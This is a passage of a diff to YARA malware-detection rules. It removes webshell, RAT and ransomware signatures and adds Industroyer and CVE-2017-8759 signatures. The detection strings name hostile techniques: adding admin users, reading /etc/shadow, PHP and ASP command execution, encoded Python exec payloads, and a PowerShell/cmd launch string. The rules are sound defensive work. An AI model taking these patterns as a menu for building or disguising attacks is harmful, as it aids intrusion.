-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
-		$w1 = "net localgroup administrators" nocase wide ascii
-		$w2 = "net user" nocase wide ascii
-		$w3 = "/add" nocase wide ascii
-		$l1 = "/etc/shadow" wide ascii
-		$l2 = "/etc/ssh/sshd_config" wide ascii
-		$take_two1 = "net user" nocase wide ascii
-		$take_two2 = "/add" nocase wide ascii
+		$s1 = "haslo.dat" fullword wide
+		$s2 = "defragsvc" fullword ascii
+		$a1 = { 00 2E 00 64 00 61 00 74 00 00 00 43 72 61 73 68 00 00 00 }
 
 	condition:
-		filesize < 70KB and ( ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) or ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) or ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) ) and ( filesize < 300KB and not uint16( 0 ) == 0x5a4d and ( all of ( $w* ) or all of ( $l* ) or 2 of ( $take_two* ) ) ) and not any of ( $fp* )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of ( $s* ) or $a1 )
 }
-rule SIGNATURE_BASE_WEBSHELL_In_Image : FILE
+rule SIGNATURE_BASE_Industroyer_Malware_5 : FILE
 {
 	meta:
-		description = "Webshell in GIF, PNG or JPG"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b1185b69-9b08-5925-823a-829fee6fa4cf"
-		date = "2021-02-27"
-		modified = "2024-03-11"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L6579-L6839"
+		description = "Detects Industroyer related malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "52ce21a0-0c72-585c-a805-c5077a7445af"
+		date = "2017-06-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/x81cSy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_industroyer.yar#L136-L158"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d4fde4e691db3e70a6320e78657480e563a9f87935af873a99db72d6a9a83c78"
-		hash = "84938133ee6e139a2816ab1afc1c83f27243c8ae76746ceb2e7f20649b5b16a4"
-		hash = "52b918a64afc55d28cd491de451bb89c57bce424f8696d6a94ec31fb99b17c11"
-		logic_hash = "e7e78107c661aa5124a37b8e492986e5a3da63c79c97c4dc3199e648a5aa4aa8"
-		score = 55
-		quality = -167
+		logic_hash = "9dfd3cfc724f0dfe090b1bcbf03b9ebd0d01b3d781f833a8ca6ba1451a63d5ad"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "7907dd95c1d36cf3dc842a1bd804f0db511a0f68f4b3d382c23a3c974a383cad"
 
 	strings:
-		$png = { 89 50 4E 47 }
-		$jpg = { FF D8 FF E0 }
-		$gif = "GIF8" wide ascii
-		$gif2 = "gif89"
-		$gif3 = "Gif89"
-		$mdb = { 00 01 00 00 53 74 }
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
-		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
-		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
-		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
-		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
-		$php_multi_write1 = "fopen(" wide ascii
-		$php_multi_write2 = "fwrite(" wide ascii
-		$php_write1 = "move_uploaded_file" fullword wide ascii
-		$cjsp1 = "<%" ascii wide
-		$cjsp2 = "<jsp:" ascii wide
-		$cjsp3 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp4 = "/jstl/core" ascii wide
-		$payload1 = "ProcessBuilder" fullword ascii wide
-		$payload2 = "processCmd" fullword ascii wide
-		$rt_payload1 = "Runtime" fullword ascii wide
-		$rt_payload2 = "getRuntime" fullword ascii wide
-		$rt_payload3 = "exec" fullword ascii wide
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$asp_payload0 = "eval_r" fullword nocase wide ascii
-		$asp_payload1 = /\beval\s/ nocase wide ascii
-		$asp_payload2 = /\beval\(/ nocase wide ascii
-		$asp_payload3 = /\beval\"\"/ nocase wide ascii
-		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
-		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
-		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
-		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
-		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
-		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
-		$asp_multi_payload_one2 = "addcode" fullword wide ascii
-		$asp_multi_payload_one3 = /\.run\b/ wide ascii
-		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
-		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
-		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
-		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
-		$asp_multi_payload_three2 = "Process" fullword wide ascii
-		$asp_multi_payload_three3 = ".Start" wide ascii
-		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
-		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
-		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
-		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
-		$asp_multi_payload_five2 = ".Start" nocase wide ascii
-		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
-		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
-		$asp_always_write1 = /\.write/ nocase wide ascii
-		$asp_always_write2 = /\.swrite/ nocase wide ascii
-		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
-		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
-		$asp_cr_write1 = "CreateObject(" nocase wide ascii
-		$asp_cr_write2 = "CreateObject (" nocase wide ascii
-		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
-		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
+		$x1 = "D2MultiCommService.exe" fullword ascii
+		$x2 = "Crash104.dll" fullword ascii
+		$x3 = "iec104.log" fullword ascii
+		$x4 = "IEC-104 client: ip=%s; port=%s; ASDU=%u " fullword ascii
+		$s1 = "Error while getaddrinfo executing: %d" fullword ascii
+		$s2 = "return info-Remote command" fullword ascii
+		$s3 = "Error killing process ..." fullword ascii
+		$s4 = "stop_comm_service_name" fullword ascii
+		$s5 = "*1* Data exchange: Send: %d (%s)" fullword ascii
 
 	condition:
-		filesize < 5MB and ( $png at 0 or $jpg at 0 or $gif at 0 or $gif at 3 or $gif2 at 0 or $gif2 at 3 or $gif3 at 0 or $mdb at 0 ) and ( ( ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) or ( any of ( $php_write* ) or all of ( $php_multi_write* ) ) ) ) or ( ( any of ( $cjsp* ) ) and ( 1 of ( $payload* ) or all of ( $rt_payload* ) ) ) or ( ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) or ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 4 of them ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_Mixed_OBFUSC : FILE
+rule SIGNATURE_BASE_CVE_2017_8759_Mal_HTA : CVE_2017_8759 FILE
 {
 	meta:
-		description = "Detects webshell with mixed obfuscation commands"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "dcb4054b-0c87-5cd0-9297-7fd5f2e37437"
-		date = "2023-01-28"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L6841-L6865"
+		description = "Detects malicious files related to CVE-2017-8759 - file cmd.hta"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e53b5149-fc94-5da5-8e35-7f09a9cd79fd"
+		date = "2017-09-14"
+		modified = "2023-12-05"
+		reference = "https://github.com/Voulnet/CVE-2017-8759-Exploit-sample"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_8759.yar#L11-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "76cc6390cbdb81055c72edb124db2bf52e3d0b975406367a9c49a0ee6621d30b"
-		score = 50
+		logic_hash = "f98578104e411fcf75a46f8a0bc3e561c94d0ca4ad7c1aae2595d03a29efd74e"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2017-8759, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8c4e5c6bdfcc86fa27bdfb075a7c9a769423ec6d53b73c80cbc71a6f8dd5aace"
-		hash2 = "78f2086b6308315f5f0795aeaa75544128f14889a794205f5fc97d7ca639335b"
-		hash3 = "3bca764d44074820618e1c831449168f220121698a7c82e9909f8eab2e297cbd"
-		hash4 = "b26b5e5cba45482f486ff7c75b54c90b7d1957fd8e272ddb4b2488ec65a2936e"
-		hash5 = "e217be2c533bfddbbdb6dc6a628e0d8756a217c3ddc083894e07fd3a7408756c"
-		importance = 70
+		hash1 = "fee2ab286eb542c08fdfef29fabf7796a0a91083a0ee29ebae219168528294b5"
 
 	strings:
-		$s1 = "rawurldecode/*" ascii
-		$s2 = "preg_replace/*" ascii
-		$s3 = " __FILE__/*" ascii
-		$s4 = "strlen/*" ascii
-		$s5 = "str_repeat/*" ascii
-		$s6 = "basename/*" ascii
+		$x1 = "Error = Process.Create(\"powershell -nop cmd.exe /c" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x3f3c and filesize < 200KB and ( 4 of them ) )
+		( uint16( 0 ) == 0x683c and filesize < 1KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_Cookie_Post_Obfuscation : FILE
+rule SIGNATURE_BASE_CVE_2017_8759_Mal_Doc : CVE_2017_8759 FILE
 {
 	meta:
-		description = "Detects webshell using cookie POST"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "cc5ded80-5e58-5b25-86d1-1c492042c740"
-		date = "2023-01-28"
-		modified = "2023-04-05"
-		reference = "https://github.com/SigmaHQ/Detection-Rule-License/blob/main/LICENSE.Detection.Rules.md"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L6867-L6893"
+		description = "Detects malicious files related to CVE-2017-8759 - file Doc1.doc"
+		author = "Florian Roth (Nextron Systems)"
+		id = "48587c13-7661-5987-8331-732115f7823b"
+		date = "2017-09-14"
+		modified = "2023-11-21"
+		reference = "https://github.com/Voulnet/CVE-2017-8759-Exploit-sample"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_8759.yar#L26-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d08a00e56feb78b7f6599bad6b9b1d8626ce9a6ea1dfdc038358f4c74e6f65c9"
-		hash = "2ce5c4d31682a5a59b665905a6f698c280451117e4aa3aee11523472688edb31"
-		hash = "ff732d91a93dfd1612aed24bbb4d13edb0ab224d874f622943aaeeed4356c662"
-		hash = "a3b64e9e065602d2863fcab641c75f5d8ec67c8632db0f78ca33ded0f4cea257"
-		hash = "d41abce305b0dc9bd3a9feb0b6b35e8e39db9e75efb055d0b1205a9f0c89128e"
-		hash = "333560bdc876fb0186fae97a58c27dd68123be875d510f46098fc5a61615f124"
-		hash = "2efdb79cdde9396ff3dd567db8876607577718db692adf641f595626ef64d3a4"
-		hash = "e1bd3be0cf525a0d61bf8c18e3ffaf3330c1c27c861aede486fd0f1b6930f69a"
-		hash = "f8cdedd21b2cc29497896ec5b6e5863cd67cc1a798d929fd32cdbb654a69168a"
-		logic_hash = "87229859ca3ee8f8b79360603c421528cda2ecefcc46d4080236d09b2dd510fb"
+		logic_hash = "0c81feebef463fee41661ca951a39ee789db5d36acc8262ddb391609d8680108"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		importance = 70
+		tags = "CVE-2017-8759, FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6314c5696af4c4b24c3a92b0e92a064aaf04fd56673e830f4d339b8805cc9635"
 
 	strings:
-		$s1 = "]($_COOKIE, $_POST) as $"
-		$s2 = "function"
-		$s3 = "Array"
+		$s1 = "soap:wsdl=http://" ascii wide
+		$s2 = "soap:wsdl=https://" ascii wide
+		$s3 = "soap:wsdl=http%3" ascii wide
+		$s4 = "soap:wsdl=https%3" ascii wide
+		$c1 = "Project.ThisDocument.AutoOpen" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x3f3c and filesize < 100KB and ( all of them ) )
+		uint16( 0 ) == 0xcfd0 and filesize < 500KB and ( 1 of ( $s* ) and $c1 )
 }
-rule SIGNATURE_BASE_Gen_Python_Pyminifier_Encoded_Payload : FILE
+rule SIGNATURE_BASE_CVE_2017_8759_SOAP_Via_JS : FILE
 {
 	meta:
-		description = "Detects python code encoded by pyminifier. Used by the Machete malware as researched by ESET"
-		author = "John Lambert @JohnLaTwC"
-		id = "d7297e6a-e1c7-57dd-a57f-a3b67face2f3"
-		date = "2019-12-16"
+		description = "Detects SOAP WDSL Download via JavaScript"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9e96cea3-4282-5f25-ad37-51bd69258790"
+		date = "2017-09-14"
 		modified = "2023-12-05"
-		reference = "https://github.com/liftoff/pyminifier"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_python_pyminifier_encoded_payload.yar#L1-L29"
+		reference = "https://twitter.com/buffaloverflow/status/907728364278087680"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_8759.yar#L47-L61"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "01df8765ea35db382d1dd67a502bf1d9647d8fe818ec31abff41c7e41c2816c0"
-		hash = "15d201152a9465497a0f9dd6939e48315b358702c5e2a3c506ad436bb8816da7"
-		hash = "ab91f76394ddf866cc0b315d862a19b57ded93be5dfc2dd0a81e6a43d0c5f301"
-		hash = "b67256906d976aafb6071d23d1b3f59a1696f26b25ff4713b9342d41e656dfba"
-		hash = "d5664c70f3543f306f765ea35e22829dbea66aec729e8e11edea9806d0255b7e"
-		hash = "dd2b0e2c2cb8a83574248bda54ce472899b22eb602e8ebecafcce2c4355177fe"
-		hash = "ed76bd136f40a23aeffe0aba02f13b9fea3428c19b715aafa6ea9be91e4006ca"
-		hash = "b454179c13cb4727ae06cc9cd126c3379e2aded5c293af0234ac3312bf9bdad2"
-		logic_hash = "6e744d9404ca476766b217fe808ba6a8cc6cbf09232a69aae6259acd377080a0"
-		score = 75
-		quality = 85
+		logic_hash = "3c170479283fe859b9ecfba4834396aaf78b375472250a4b188bc913f69c97fd"
+		score = 60
+		quality = 81
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "exec(zlib.decompress(base64.b64decode('eJ"
-		$s2 = "base64" fullword
-		$s3 = "zlib" fullword
+		$s1 = "GetObject(\"soap:wsdl=https://" ascii wide nocase
+		$s2 = "GetObject(\"soap:wsdl=http://" ascii wide nocase
 
 	condition:
-		filesize < 20KB and uint32be( 0 ) == 0x696d706f and all of them
+		( filesize < 3KB and 1 of them )
 }
-rule SIGNATURE_BASE_Minirat_Gen_1 : FILE
+rule SIGNATURE_BASE_CVE_2017_8759_SOAP_Excel : CVE_2017_8759 FILE
 {
 	meta:
-		description = "Detects Mini RAT malware"
+		description = "Detects malicious files related to CVE-2017-8759"
 		author = "Florian Roth (Nextron Systems)"
-		id = "65d89762-2fd0-5c6a-b706-92d77a03089a"
-		date = "2018-01-22"
+		id = "940ec910-49a4-5271-97e4-8536db271b80"
+		date = "2017-09-15"
 		modified = "2023-12-05"
-		reference = "https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_darkcaracal.yar#L12-L30"
+		reference = "https://twitter.com/buffaloverflow/status/908455053345869825"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_8759.yar#L63-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "53c4ba16ae2c3eb3a6c7371e7fc8b962cfbee5b70abd8267294834eac3e55769"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		logic_hash = "adea595b251796e93cdc54cc59198d88a68e28d42899c90721f63f6813df24fe"
+		score = 60
+		quality = 83
+		tags = "CVE-2017-8759, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b"
-		hash2 = "b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d"
-		hash3 = "ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2"
-		hash4 = "ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790"
-		hash5 = "675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd"
 
 	strings:
-		$x1 = "\\Mini rat\\" ascii
-		$x2 = "\\Projects\\ali\\Clever Components v7\\" ascii
+		$s1 = "|'soap:wsdl=" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 7000KB and 1 of them
+		( filesize < 300KB and 1 of them )
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Ragna_Locker_Apr20_1 : FILE
+rule SIGNATURE_BASE_CVE_2017_8759_SOAP_Txt : CVE_2017_8759 FILE
 {
 	meta:
-		description = "Detects Ragna Locker Ransomware"
+		description = "Detects malicious file in releation with CVE-2017-8759 - file exploit.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "67164cb4-73b7-5c4e-88f9-42379b88c641"
-		date = "2020-04-27"
+		id = "36474420-4fa9-5264-a46b-bb2434624710"
+		date = "2017-09-14"
 		modified = "2023-12-05"
-		reference = "https://otx.alienvault.com/indicator/file/c2bd70495630ed8279de0713a010e5e55f3da29323b59ef71401b12942ba52f6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_ragna_locker.yar#L3-L36"
+		reference = "https://github.com/Voulnet/CVE-2017-8759-Exploit-sample"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_8759.yar#L78-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "05a18818f22c836c3e1f1fa9682d787bbe86e6d3bb026a80a7d4c33ad95c2cd3"
+		logic_hash = "184179006ed2ac2ad76e09c53196805fcb1b7380dab1d5740b4469a89d6b0b32"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		hash1 = "c2bd70495630ed8279de0713a010e5e55f3da29323b59ef71401b12942ba52f6"
+		quality = 60
+		tags = "CVE-2017-8759, FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "840ad14e29144be06722aff4cc04b377364eeed0a82b49cc30712823838e2444"
 
 	strings:
-		$x1 = "---RAGNAR SECRET---" ascii
-		$xc1 = { 0D 0A 25 73 0D 0A 0D 0A 25 73 0D 0A 25 73 0D 0A
-               25 73 0D 0A 0D 0A 25 73 0D 0A 00 00 2E 00 72 00
-               61 00 67 00 6E 00 61 00 72 00 5F }
-		$xc2 = { 00 2D 00 66 00 6F 00 72 00 63 00 65 00 00 00 00
-               00 57 00 69 00 6E 00 53 00 74 00 61 00 30 00 5C
-               00 44 00 65 00 66 00 61 00 75 00 6C 00 74 00 00
-               00 5C 00 6E 00 6F 00 74 00 65 00 70 00 61 00 64
-               00 2E 00 65 00 78 00 65 00 }
-		$s1 = "bootfont.bin" wide fullword
-		$sc2 = { 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 00
-               00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 2E
-               00 6F 00 6C 00 64 00 00 00 54 00 6F 00 72 00 20
-               00 62 00 72 00 6F 00 77 00 73 00 65 00 72 00 }
-		$op1 = { c7 85 58 ff ff ff 55 00 6b 00 c7 85 5c ff ff ff }
-		$op2 = { 50 c7 85 7a ff ff ff 5c }
-		$op3 = { 8b 75 08 8a 84 0d 20 ff ff ff ff 45 08 32 06 8b }
+		$s1 = /<soap:address location="http[s]?:\/\/[^"]{8,140}.hta"/ ascii wide
+		$s2 = /<soap:address location="http[s]?:\/\/[^"]{8,140}mshta.exe"/ ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) or 4 of them
+		( filesize < 200KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_MAL_Ransom_Ragnarlocker_July_2020_1 : FILE
+rule SIGNATURE_BASE_CVE_2017_8759_WSDL_In_RTF : CVE_2017_8759 FILE
 {
 	meta:
-		description = "Detects Ragnarlocker by strings (July 2020)"
-		author = "Arkbird_SOLG"
-		id = "60e09057-d9f8-5e89-8f47-c5dda32806c6"
-		date = "2020-07-30"
+		description = "Detects malicious RTF file related CVE-2017-8759"
+		author = "Security Doggo @xdxdxdxdoa"
+		id = "daaa5489-af96-5a69-b2dd-81406c0a1edc"
+		date = "2017-09-15"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1288797666688851969"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_ragna_locker.yar#L38-L70"
+		reference = "https://twitter.com/xdxdxdxdoa/status/908665278199996416"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_8759.yar#L94-L110"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dc44da2f9023e0702afa8081e85ba817ebfde15f449261fae9de729d51262b04"
+		logic_hash = "47adc7adfc55239792aef818648546adb1627e74690de0d811100cc49aab8c2f"
 		score = 75
-		quality = 83
-		tags = "FILE"
-		hash1 = "04c9cc0d1577d5ee54a4e2d4dd12f17011d13703cdd0e6efd46718d14fd9aa87"
+		quality = 85
+		tags = "CVE-2017-8759, FILE"
 
 	strings:
-		$f1 = "bootfont.bin" fullword wide
-		$f2 = "bootmgr.efi" fullword wide
-		$f3 = "bootsect.bak" fullword wide
-		$r1 = "$!.txt" fullword wide
-		$r2 = "---BEGIN KEY R_R---" fullword ascii
-		$r3 = "!$R4GN4R_" wide
-		$r4 = "RAGNRPW" fullword ascii
